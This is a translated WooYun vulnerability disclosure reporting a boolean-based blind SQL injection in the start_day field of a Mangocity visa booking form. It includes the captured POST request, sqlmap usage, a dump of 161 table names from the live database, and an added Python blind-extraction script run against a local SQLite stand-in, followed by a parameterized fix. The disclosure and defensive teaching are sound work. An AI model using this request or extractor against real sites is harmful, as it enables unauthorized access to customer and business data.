
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0136826

Title: A Mangocity site has a SQL injection vulnerability, part 1 (boolean-based blind)

Vendor: 芒果网 (Mangocity)

Author: Xmyth_夏洛克

Submitted: 2015-08-25 14:12

Fix time: 2015-08-30 14:14

Published: 2015-08-30 14:14

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)



Vulnerability details

Disclosure status:

2015-08-25: details sent to the vendor, awaiting the vendor's handling
2015-08-30: vendor actively ignored the vulnerability, details disclosed to the public

Brief description:

23333

Detailed description:

The online booking system on a Mangocity sub-site (the /visa/online.jsp form) has an injectable page:
bj.mangocity.com/visa/online.jsp

[screenshot: 在线订机票.png, the online booking page]

The injectable parameter:

[screenshot: 存在注入的参数.png]


Captured POST request:

POST /visa/online.jsp?act=do HTTP/1.1
Host: bj.mangocity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://bj.mangocity.com/visa/online.jsp
Cookie: __ozlvd=1439444078; Hm_lvt_0b2665fd0279a4d150b6ccadb25603e8=1439444080; __utma=29435872.951864969.1439444083.1439444083.1439444083.1; __utmz=29435872.1439444083.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=57D2CFE65451C267CAC6D936BB3027F9; Hm_lvt_c449fb62c2976a115c477bd115dd9384=1440480237; Hm_lpvt_c449fb62c2976a115c477bd115dd9384=1440480237
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 439

quna1=%E6%96%B0%E5%8A%A0%E5%9D%A1&visa_type=%E5%BA%A6%E5%81%87%E6%97%85%E6%B8%B8&service=%E5%85%A8%E9%83%A8%E8%A1%8C%E7%A8%8B%E5%AE%89%E6%8E%92%2C&countryonlinem=&countryonline=%E6%96%B0%E5%8A%A0%E5%9D%A1&visa_type=%E5%BA%A6%E5%81%87%E6%97%85%E6%B8%B8&service5=%E5%85%A8%E9%83%A8%E8%A1%8C%E7%A8%8B%E5%AE%89%E6%8E%92&qty_item_1=1&start_month=1&start_day=1&end_month=1&end_day=1&user_name=123&mobile=13010204567&email=123%40qq.com&question=


Feed the saved request to sqlmap (sqlmap -r with the request file): the start_day parameter is injectable, and the injection is boolean-based blind, i.e. the only signal is whether the page content changes for a true versus a false injected condition.

[screenshot: 布尔型盲注.jpg, sqlmap output]


Proof of vulnerability:

3 databases are reachable:

[screenshot: 涉及3个数据库.png]

161 tables:

[screenshot: 161个表.png]

Database: ut7
[161 tables]
+---------------------------+
| account_info |
| call_post_set |
| comments |
| comments_reply |
| crm_info |
| dev_data_fields |
| dev_data_table |
| dev_input_field |
| dev_page_input |
| dev_template |
| fm_parameter |
| fm_parameter_set |
| fm_receivables_payables |
| g_accessory |
| g_fm_accounting |
| g_fm_advertisement |
| g_fm_inspect |
| g_fm_person_brokerage |
| g_sign_state |
| gather_document |
| gl_season_destination |
| gl_strategy |
| gl_strategy_page_block |
| hc_train_info |
| high_custom |
| hk_airlines_info |
| hk_flight_info |
| hk_models |
| hotel_basic_info |
| hotel_photo |
| hotel_price_info |
| hotel_room_info |
| income_expenses_single |
| insurance_company |
| insurance_info |
| jd_facility |
| jd_group_info |
| jd_hotel_info |
| jd_photo |
| jd_room_info |
| l_photo |
| member_log |
| mobile_web_page_block |
| monthly_balance |
| oa_appliance |
| oa_leave |
| oa_notice |
| oa_purchase |
| oa_purchase_log |
| oa_report_annul |
| oa_report_annul_log |
| oa_supplier |
| oa_userget |
| old_order |
| online_ask |
| optional_order |
| order_basic_info |
| order_checkseat |
| order_doc |
| order_file |
| order_finance_statistics |
| order_gathering |
| order_insurance |
| order_invoice |
| order_other_cost |
| order_outteam |
| order_pay |
| order_pay_log |
| order_pledge |
| order_reality_data |
| order_refund |
| order_remark |
| order_supplier |
| order_visit |
| order_visit_log |
| os_accessory_file |
| os_city |
| os_company |
| os_country |
| os_data_source |
| os_fileup |
| os_function |
| os_g_destination |
| os_g_trip_type |
| os_help |
| os_log |
| os_login_user |
| os_module |
| os_order |
| os_photo |
| os_province |
| os_suggest |
| os_system |
| pay_order |
| personal_quick |
| phone_to_callcenter |
| qc_car_info |
| qc_group_info |
| reg_member |
| reg_tables |
| remit_info |
| reply_question |
| scenic_info |
| scenic_photo |
| self_expense |
| set_of_book |
| sign_contract |
| sms_date |
| sms_log |
| sms_port |
| sort_table |
| strategy_article |
| strategy_aspect_info |
| strategy_destination_info |
| strategy_photo |
| strategy_web_column |
| system_seting |
| system_variable |
| t_ad |
| t_admin |
| t_article |
| t_base_trans |
| t_category |
| t_commen |
| t_gather |
| t_gatherhis |
| t_keywords |
| t_label |
| t_role |
| t_source |
| t_special |
| t_template |
| t_vote |
| t_voteitem |
| t_web_seting |
| tour_aspect |
| tour_basic_info |
| tour_basic_info_order |
| tour_destination |
| tour_price_info |
| tour_price_info_order |
| tour_schedule_info |
| tour_shoping |
| tour_stard_info |
| tour_time |
| trip_type |
| user_department |
| user_msg |
| visa_basic_info |
| visa_reservation |
| visa_test |
| visitor_list |
| web_article |
| web_column |
| web_custom |
| web_email_subscriptions |
| web_error_page |
| web_friendly_link |
| web_page_block |
| web_set_tour_aspect |
| web_set_tour_destination |
+---------------------------+

Fix recommendation:

Filter the input. Concretely: validate start_day and the other numeric date fields as integers before use, and pass every form value to the database through parameterized queries (PreparedStatement in JSP/Java) instead of concatenating it into the SQL string. Filtering alone, without parameter binding, leaves the other fields in this form (user_name, email, question, ...) exposed to the same class of bug.

Copyright: when reposting, credit the source Xmyth_夏洛克@乌云
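The two technical points of this report, the boolean-based blind inference sqlmap performed on start_day and the fix just recommended, as one added example. This is not code from the report or from Mangocity: the real DBMS and the request/response format are not named on the page, so an in-memory SQLite table called visa_reservation (the name is taken from the table dump, its columns are constructed) stands in for the backend, and a Python function stands in for the JSP handler. Only the parameter name start_day comes from the page. The script shows the vulnerable handler leaking one bit per request, an extractor that turns that bit into the first table name by binary search on each character's code point (the strategy sqlmap uses), and the parameterized handler against which the same probes no longer distinguish anything.

```python
import sqlite3

# Added example, not code from the report or from Mangocity. The backend DBMS is not
# named on the page; this in-memory SQLite database is a constructed stand-in so the
# script runs offline. Only the parameter name start_day is taken from the page.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE visa_reservation ("
        "id INTEGER PRIMARY KEY, start_month INTEGER, start_day INTEGER, user_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO visa_reservation (start_month, start_day, user_name) VALUES (?, ?, ?)",
        [(1, 1, "alice"), (1, 2, "bob")],  # constructed rows
    )
    return conn


def vulnerable_handler(conn, start_day):
    """The bug class in the report: the form value is concatenated into the SQL text."""
    sql = "SELECT COUNT(*) FROM visa_reservation WHERE start_day = " + start_day
    try:
        count = conn.execute(sql).fetchone()[0]
    except sqlite3.Error:
        return "error page"
    # The page differs depending on whether the query matched a row: that single
    # bit is all a boolean-based blind attack needs.
    return "booking found" if count else "no booking"


def fixed_handler(conn, start_day):
    """Hardened form: validate the type, then bind the value with a placeholder."""
    try:
        day = int(start_day)
    except ValueError:
        return "invalid day"
    count = conn.execute(
        "SELECT COUNT(*) FROM visa_reservation WHERE start_day = ?", (day,)
    ).fetchone()[0]
    return "booking found" if count else "no booking"


def make_oracle(handler, conn):
    """Wrap a handler as a yes/no oracle: True when the injected condition held."""
    calls = {"n": 0}

    def oracle(payload):
        calls["n"] += 1
        return handler(conn, payload) == "booking found"

    return oracle, calls


def blind_extract(oracle, expr, max_len=64):
    """Recover the string value of SQL expression `expr` from true/false answers only.

    Each character is found by binary search on its code point (7 probes for ASCII),
    the same approach sqlmap takes for boolean-based blind injection. SQLite's
    substr()/unicode() are used here; MySQL would need SUBSTRING()/ASCII() instead.
    """
    result = ""
    for pos in range(1, max_len + 1):
        # "1" keeps the legitimate row match; the AND clause is the question asked.
        if not oracle(f"1 AND length(({expr})) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1 AND unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


# Expression whose value the attacker wants; here the first table name.
FIRST_TABLE = "SELECT name FROM sqlite_master WHERE type = 'table' LIMIT 1"

if __name__ == "__main__":
    conn = make_db()
    # The classic probe pair: different answers on the vulnerable handler,
    # identical (rejected) answers on the fixed one.
    for h in (vulnerable_handler, fixed_handler):
        print(h.__name__, h(conn, "1 AND 1=1"), "/", h(conn, "1 AND 1=2"))
    oracle, calls = make_oracle(vulnerable_handler, conn)
    print("first table:", blind_extract(oracle, FIRST_TABLE), "after", calls["n"], "requests")
```

Against the vulnerable handler, "1 AND 1=1" and "1 AND 1=2" produce different pages, which is exactly the behaviour sqlmap reported for start_day; the extractor then needs a few hundred such requests per table name, which is why a 161-table dump is cheap for an attacker. Against the parameterized handler every probe is rejected at the int() check and the database never sees attacker-controlled SQL.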


Vendor response

Vendor reply:

Severity: no impact, vendor ignored

Ignored at: 2015-08-30 14:14

Vendor comment: (none)

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None


Vulnerability review:

Comments

  1. 2015-08-30 15:11 | Security ( passer-by | Rank:25 vulnerabilities:9 )

    The two characters "神话" (myth) are too glaring!

  2. 2015-08-30 20:03 | Xmyth_夏洛克 ( ordinary white hat | Rank:477 vulnerabilities:62 | can't do anything )

    @Security 2333333